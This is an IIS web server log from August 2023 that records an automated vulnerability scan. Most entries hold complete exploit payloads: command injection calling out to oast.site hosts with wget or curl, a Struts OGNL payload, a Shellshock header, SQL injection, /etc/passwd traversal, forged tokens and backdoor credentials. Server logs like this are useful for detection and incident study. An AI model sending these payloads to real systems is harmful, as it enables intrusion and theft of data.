Current File : C:/inetpub/logs/wmsvc/W3SVC1/ex230804.log

#Software: Microsoft Internet Information Services 10.0
#Version: 1.0
#Date: 2023-08-04 00:00:35
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2023-08-04 00:00:35 103.153.214.94 POST /classes/Master.php f=delete_supplier 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 64
2023-08-04 00:03:06 103.153.214.94 GET /solr/admin/cores wt=json 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 404 7 0 186
2023-08-04 00:05:19 103.153.214.94 POST / - 8172 - 111.90.143.37 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 404 7 0 83
2023-08-04 00:13:07 103.153.214.94 POST /login.php - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 7 0 81
2023-08-04 00:16:49 103.153.214.94 GET / - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 404 7 0 71
2023-08-04 00:16:56 103.153.214.94 GET /hw-sys.htm - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 404 7 0 59
2023-08-04 00:19:06 103.153.214.94 POST /cgi-bin/login.cgi - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 404 7 0 58
2023-08-04 00:20:42 103.153.214.94 POST /api/edr/sangforinter/v2/cssp/slog_client token=eyJtZDUiOnRydWV9 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 83
2023-08-04 00:26:28 103.153.214.94 GET /Collector/nms/addModifyZTDProxy ztd_server=127.0.0.1&ztd_port=3333&ztd_username=user&ztd_password=$(/bin/wget$IFShttp://cj5gsq24749fn87ofdl0ud5uatias9381.oast.site) 8172 - 111.90.143.37 - - 404 7 0 81
2023-08-04 00:30:07 103.153.214.94 GET /wp-content/plugins/cab-fare-calculator/tblight.php controller=../../../../../../../../../../../etc/passwd%00&action=1&ajax=1 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 404 7 0 62
2023-08-04 00:30:18 103.153.214.94 POST /wp-admin/admin-ajax.php action=joomsport_md_load 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 404 7 0 63
2023-08-04 00:37:09 103.153.214.94 POST /wp-admin/admin-ajax.php image_id=123 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 404 7 0 78
2023-08-04 00:38:22 103.153.214.94 GET /index.php s=weibo/Share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule%26id[status]=1%26id[method]=Schedule-%3E_validationFieldItem%26id[4]=function%26[6][]=%26id[0]=cmd%26id[1]=assert%26id[args]=cmd=system(ver) 8172 - 111.90.143.37 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 404 7 0 61
2023-08-04 00:38:28 103.153.214.94 GET /index.php s=weibo/Share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule%26id[status]=1%26id[method]=Schedule-%3E_validationFieldItem%26id[4]=function%26[6][]=%26id[0]=cmd%26id[1]=assert%26id[args]=cmd=system(id) 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 404 7 0 57
2023-08-04 00:41:07 103.153.214.94 GET /aj.html a=devi 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 404 7 0 62
2023-08-04 00:47:32 103.153.214.94 GET /nacos/v1/auth/users pageNo=1&pageSize=10&accessToken=eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6OTk5OTk5OTk5OTl9.-isk56R8NfioHVYmpj4oz92nUteNBCN3HRd0-Hfk76g 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 60
2023-08-04 00:47:32 103.153.214.94 POST /SamlResponseServlet - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 404 7 0 79
2023-08-04 00:47:39 103.153.214.94 GET /v1/auth/users pageNo=1&pageSize=10&accessToken=eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6OTk5OTk5OTk5OTl9.-isk56R8NfioHVYmpj4oz92nUteNBCN3HRd0-Hfk76g 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 404 7 0 80
2023-08-04 00:54:17 103.153.214.94 GET /admin/cms_channel.php del=123456+AND+(SELECT+1+FROM(SELECT+COUNT(*)%2cCONCAT(0x7e%2cmd5(999999999)%2c0x7e%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)--%2b' 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 404 7 0 83
2023-08-04 00:56:41 103.153.214.94 GET / - 8172 - 111.90.143.37 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 404 7 0 78
2023-08-04 01:05:09 103.153.214.94 POST /assets/php/upload.php - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 http://bcvt.kontum.gov.vn:8172 404 7 0 88
2023-08-04 01:05:18 103.153.214.94 GET /assets/data/usrimg/2tsgvsfemm6dkaq6oyvgfe62fld.php - 8172 - 111.90.143.37 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 404 7 0 81
2023-08-04 01:05:51 103.153.214.94 POST /auth/requestreset - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 404 7 0 121
2023-08-04 01:06:00 103.153.214.94 POST /auth/requestreset - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 404 7 0 55
2023-08-04 01:09:33 103.153.214.94 POST /http/index.php - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 7 0 86
2023-08-04 01:13:00 103.153.214.94 PUT /PhoneBackup/2TSGVvACNaRoppesvj6bA7kQOHz.php - 8172 - 111.90.143.37 AVAYA - 404 7 0 127
2023-08-04 01:13:06 103.153.214.94 GET /PhoneBackup/2TSGVvACNaRoppesvj6bA7kQOHz.php - 8172 - 111.90.143.37 AVAYA - 404 7 0 65
2023-08-04 01:14:27 103.153.214.94 GET /api/experimental/patternfile order=id%3Bselect(md5(999999999))&page=0&page_size=0 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 404 7 0 78
2023-08-04 01:24:50 103.153.214.94 GET /wlsecurity.html - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 58
2023-08-04 01:25:23 103.153.214.94 GET /ajax-api/2.0/mlflow-artifacts/artifacts path=C:/ 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 55
2023-08-04 01:32:47 103.153.214.94 GET /webadmin/clientlogin/ srid&action=showdeny&url 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 7 0 80
2023-08-04 01:33:27 103.153.214.94 GET /cgi-bin/kerbynet Action=StartSessionSubmit&User='%0acat%20/etc/passwd%0a'&PW 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 404 7 0 59
2023-08-04 01:38:38 103.153.214.94 GET / - 8172 - 111.90.143.37 python-requests/2.26.0 - 404 7 0 88
2023-08-04 01:38:40 103.153.214.94 POST /moveitisapi/moveitisapi.dll action=m2 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 81
2023-08-04 01:38:42 103.153.214.94 POST /guestaccess.aspx - 8172 - 111.90.143.37 python-requests/2.26.0 - 404 7 0 56
2023-08-04 01:44:38 103.153.214.94 POST /hms/user-login.php - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 404 7 0 59
2023-08-04 01:48:03 103.153.214.94 POST /cgi-bin/rpc - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 404 7 0 80
2023-08-04 01:58:38 103.153.214.94 GET / username=zyfwp&password=PrOw!aN_fXp 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 404 7 0 91
2023-08-04 01:58:43 103.153.214.94 GET /ext-js/index.html - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 404 7 0 119
2023-08-04 02:02:55 103.153.214.94 GET /index.php rest_route=/xs-donate-form/payment-redirect/3 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 7 0 72
2023-08-04 02:04:39 103.153.214.94 GET /cgi-bin/slogin/login.py - 8172 - 111.90.143.37 ()+{+:;+};+echo+;+echo+;+/bin/cat+/etc/passwd - 404 7 0 100
2023-08-04 02:05:40 103.153.214.94 POST /wls-wsat/CoordinatorPortType - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 404 7 0 117
2023-08-04 02:05:47 103.153.214.94 POST /_async/AsyncResponseService - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 404 7 0 119
2023-08-04 02:05:55 103.153.214.94 GET /_async/favicon.ico - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 404 7 0 72
2023-08-04 02:14:44 103.153.214.94 POST /saas./resttosaasservlet - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 0 0 85
2023-08-04 02:16:31 103.153.214.94 POST /boaform/admin/formTracert - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 https://bcvt.kontum.gov.vn:8172/diag_ping_admin_en.asp 404 7 0 55
2023-08-04 02:22:11 103.153.214.94 POST /account - 8172 - 111.90.143.37 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 404 7 0 83
2023-08-04 02:22:17 103.153.214.94 POST /account - 8172 - 111.90.143.37 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 404 7 0 80
2023-08-04 02:28:01 103.153.214.94 POST /cgi-bin/system_mgr.cgi - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 7 0 85
2023-08-04 02:28:06 103.153.214.94 POST /cgi-bin/system_mgr.cgi C1=ON&cmd=cgi_ntp_time&f_ntp_server=`curl 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 83
2023-08-04 02:29:08 103.153.214.94 POST / name=%25%7B%28%23dm%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS%29.%28%23_memberAccess%3F%28%23_memberAccess%3D%23dm%29%3A%28%28%23container%3D%23context%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ognlUtil%3D%23container.getInstance%28%40com.opensymphony.xwork2.ognl.OgnlUtil%40class%29%29.%28%23ognlUtil.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ognlUtil.getExcludedClasses%28%29.clear%28%29%29.%28%23context.setMemberAccess%28%23dm%29%29%29%29.%28%23cmd%3D%27cat%20/etc/passwd%27%29.%28%23iswin%3D%28%40java.lang.System%40getProperty%28%27os.name%27%29.toLowerCase%28%29.contains%28%27win%27%29%29%29.%28%23cmds%3D%28%23iswin%3F%7B%27cmd.exe%27%2C%27/c%27%2C%23cmd%7D%3A%7B%27/bin/bash%27%2C%27-c%27%2C%23cmd%7D%29%29.%28%23p%3Dnew%20java.lang.ProcessBuilder%28%23cmds%29%29.%28%23p.redirectErrorStream%28true%29%29.%28%23process%3D%23p.start%28%29%29.%28%40org.apache.commons.io.IOUtils%40toString%28%23process.getInputStream%28%29%29%29%7D 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 59
2023-08-04 02:30:21 103.153.214.94 GET /anchor/errors.log - 8172 - 111.90.143.37 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 404 7 0 76
2023-08-04 02:38:58 103.153.214.94 GET /wan.htm - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 72
2023-08-04 02:40:47 103.153.214.94 GET /users/sign_in - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 7 0 62
2023-08-04 02:46:13 103.153.214.94 POST /ajaxPages/writeBrowseFilePathAjax.php - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 404 7 0 56
2023-08-04 02:46:24 103.153.214.94 GET /2TSGV5qqWcmjU7jCQeYtdiYiX0j.php cmd=sudo+rpm+--eval+'%25{lua%3aos.execute("curl+http%3a//cj5gsq24749fn87ofdl0np6qhwhs4b1pd.oast.site+-H+'User-Agent%3a+uknTmr'")}' 8172 - 111.90.143.37 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 404 7 0 82
2023-08-04 02:46:57 103.153.214.94 POST /page/exportImport/uploadOperation.jsp - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 404 7 0 93
2023-08-04 02:47:06 103.153.214.94 GET /page/exportImport/fileTransfer/2TSGVSunFFVo2BR53s98kwk0j8n.jsp - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 107
2023-08-04 02:52:25 103.153.214.94 POST /webadm/ q=moni_detail.do&action=gragh 8172 - 111.90.143.37 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 404 7 0 79
2023-08-04 02:53:33 103.153.214.94 GET /plugin - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 78
2023-08-04 03:02:36 103.153.214.94 GET /cgi-bin/Maconomy/MaconomyWS.macx1.W_MCS/etc/passwd - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 404 7 0 59
2023-08-04 03:03:15 103.153.214.94 GET /openam/oauth2/..;/ccversion/Version - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 404 5 0 84
2023-08-04 03:04:53 103.153.214.94 POST / - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 404 7 0 81
2023-08-04 03:12:50 103.153.214.94 GET /images/icons_title.gif - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 404 7 0 85
2023-08-04 03:13:02 103.153.214.94 DELETE /images/icons_title.gif - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 79
2023-08-04 03:13:14 103.153.214.94 GET /images/icons_title.gif - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 404 7 0 72
2023-08-04 03:18:23 103.153.214.94 GET / cffaction=get_data_from_database&query=SELECT%20*%20from%20wp_users 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 70
2023-08-04 03:19:37 103.153.214.94 GET /metadata/v1.json - 8172 - 111.90.143.37 - - 404 7 0 60
2023-08-04 03:19:47 103.153.214.94 GET /metadata/v1.json - 8172 - 111.90.143.37 - - 404 7 0 80
2023-08-04 03:21:36 103.153.214.94 GET / - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 61
2023-08-04 03:23:22 103.153.214.94 POST /controller/ping.php - 8172 - 111.90.143.37 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F https://bcvt.kontum.gov.vn:8172/controller/ping.php 404 7 0 65
2023-08-04 03:36:41 103.153.214.94 GET /user.php act=login 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:72:"0,1+procedure+analyse(extractvalue(rand(),concat(0x7e,version())),1)--+-";s:2:"id";i:1;} 404 7 0 84
2023-08-04 03:36:47 103.153.214.94 GET /user.php act=login 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:107:"*/SELECT+1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b706870696e666f0928293b2f2f7d787878,10--+-";s:2:"id";s:11:"-1'+UNION/*";}554fcae493e564ee0dc75bdf2ebf94ca 404 7 0 82
2023-08-04 03:37:34 103.153.214.94 GET /photo/combine.php type=javascript&g=core-r7rules/../../../hello.php. 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 404 7 0 86
2023-08-04 03:38:59 103.153.214.94 GET /vpns/cfg/smb.conf - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 88
2023-08-04 03:43:21 103.153.214.94 GET /install - 8172 - 111.90.143.37 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 404 7 0 57
2023-08-04 03:45:15 103.153.214.94 GET / rest_route=/pmpro/v1/order&code=a%27%20OR%20(SELECT%201%20FROM%20(SELECT(SLEEP(5)))a)--%20- 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 59
2023-08-04 03:45:20 103.153.214.94 GET /wp-content/plugins/paid-memberships-pro/js/updates.js - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 404 7 0 72
2023-08-04 03:50:08 103.153.214.94 GET /api/ping count=5&host=;cat%20/etc/passwd;&port=80&source=1.1.1.1&type=icmp 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 404 7 0 59
2023-08-04 03:51:33 103.153.214.94 GET /lab.html vpath=//interact.sh 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 404 7 0 87
2023-08-04 03:57:17 103.153.214.94 HEAD /msdeploy.axd Site=qlk.qfoody.vn 8172 - 119.82.130.75 - - 401 2 5 15
2023-08-04 03:57:17 103.153.214.94 HEAD /msdeploy.axd Site=qlk.qfoody.vn 8172 jenkins 119.82.130.75 - - 200 0 0 24
2023-08-04 03:57:17 103.153.214.94 HEAD /msdeploy.axd Site=qlk.qfoody.vn 8172 jenkins 119.82.130.75 - - 200 0 0 20
2023-08-04 03:57:17 103.153.214.94 POST /msdeploy.axd Site=qlk.qfoody.vn 8172 jenkins 119.82.130.75 MSDeployExe;sid=11533781-99eb-414b-96bf-ec8de7548815;op=Sync - 200 0 0 536
2023-08-04 03:57:17 103.153.214.94 POST /msdeploy.axd Site=qlk.qfoody.vn 8172 jenkins 119.82.130.75 - - 200 0 0 592
2023-08-04 03:57:17 103.153.214.94 HEAD /msdeploy.axd Site=qlk.qfoody.vn 8172 jenkins 119.82.130.75 - - 200 0 0 7
2023-08-04 03:58:19 103.153.214.94 POST /msdeploy.axd Site=qlk.qfoody.vn 8172 jenkins 119.82.130.75 MSDeployExe;sid=11533781-99eb-414b-96bf-ec8de7548815;op=Sync - 200 0 0 61911
2023-08-04 03:58:19 103.153.214.94 POST /msdeploy.axd Site=qlk.qfoody.vn 8172 jenkins 119.82.130.75 - - 200 0 0 61940
2023-08-04 03:59:20 103.153.214.94 POST /wp-admin/admin-ajax.php - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 404 7 0 60
2023-08-04 03:59:28 103.153.214.94 GET /wp-content/plugins/arprice-responsive-pricing-table/js/arprice.js - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 345
2023-08-04 04:03:23 103.153.214.94 POST /api/content/ - 8172 - 111.90.143.37 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 404 7 0 82
2023-08-04 04:03:23 103.153.214.94 GET /2TSGUqO5S8rji5Z6lBD1AI8vk3o.jsp - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 404 7 0 79
2023-08-04 04:04:17 103.153.214.94 GET /clusterList - 8172 - 111.90.143.37 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 404 7 0 81
2023-08-04 04:05:16 103.153.214.94 GET /wp-admin/install.php step=1 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 61
2023-08-04 04:08:27 103.153.214.94 POST / - 8172 - 111.90.143.37 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 404 7 0 99
2023-08-04 04:16:31 103.153.214.94 GET /rest/v1/AccountService/Accounts - 8172 - 111.90.143.37 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 404 7 0 76
2023-08-04 04:18:30 103.153.214.94 POST /process/aprocess.php - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 404 7 0 54
2023-08-04 04:19:49 103.153.214.94 POST /ajax/api/user/save - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 7 0 85
2023-08-04 04:22:59 103.153.214.94 POST /texteditor.php - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 73
